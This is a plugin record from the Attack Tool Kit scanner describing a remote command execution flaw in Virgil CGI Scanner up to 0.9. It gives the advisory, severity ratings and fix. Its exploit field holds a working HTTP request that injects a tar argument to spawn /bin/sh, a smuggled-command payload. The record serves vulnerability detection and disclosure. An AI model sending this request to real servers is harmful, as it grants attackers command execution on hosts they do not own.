Virgil CGI Scanner 0.x command execution 2.0
 
Plugin ID37
Plugin nameVirgil CGI Scanner 0.x command execution
Plugin filenameVirgil CGI Scanner command execution.plugin
Plugin filesize2921 bytes
Plugin familyHTTP
Plugin created nameMarc Ruef
Plugin created emailmarc dot ruef at computec dot ch
Plugin created webhttp://www.computec.ch
Plugin created companycomputec.ch
Plugin created date2003/11/14
Plugin updated nameMarc Ruef
Plugin updated emailmarc dot ruef at computec dot ch
Plugin updated webhttp://www.computec.ch
Plugin updated companycomputec.ch
Plugin updated date2004/11/14
Plugin version2.0
Plugin changelogOptimized the trigger pattern to be more accurate in version 1.3. Corrected the plugin structure and added the accuracy values in 1.4. Improved the pattern matching and introduced the plugin changelog in 2.0
Plugin protocoltcp
Plugin port80
Plugin procedure exploitopen|send GET /cgi-bin/virgil.cgi?tar=-le/bin/sh HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# 200 *
Plugin exploit accuracy99
Plugin commentThis plugin was written with the ATK Attack Editor.
Bug advisoryhttp://www.securityfocus.com/archive/1/296635
Bug affectedVirgil CGI Scanner 0.x up to 0.9
Bug not affectedVirgil CGI Scanner newer than 0.9
Bug vulnerability classConfiguration
Bug descriptionVirgil CGI Scanner is an open-source CGI scanner with web frontend. The software fails to sufficiently sanitize user-supplied input. By passing a malicious value to a CGI variable, it may be possible for a remote attacker to execute arbitrary system commands, with the privileges of the webserver process.
Bug solutionUpgrade to Virgil CGI Scanner 1.0 or use htaccess authentication for the scanning service.
Bug fixing time15 minutes
Bug exploit availabilityYes
Bug exploit urlhttp://www.securityfocus.com/bid/6031/exploit/
Bug remoteYes
Bug localYes
Bug severityHigh
Bug popularity5
Bug simplicity7
Bug impact8
Bug risk7
Source SecurityFocus BID6031
Source Secunia ID7368
Source LiteratureHacking Intern - Angriffe, Strategien, Abwehr, Marc Ruef, Marko Rogge, Uwe Velten and Wolfram Gieseke, November 1, 2002, Data Becker, Düsseldorf, ISBN 381582284X
Source Misc.http://www.computec.ch

This file was generated by the Attack Tool Kit (ATK), the open-sourced security scanner and exploiting framework.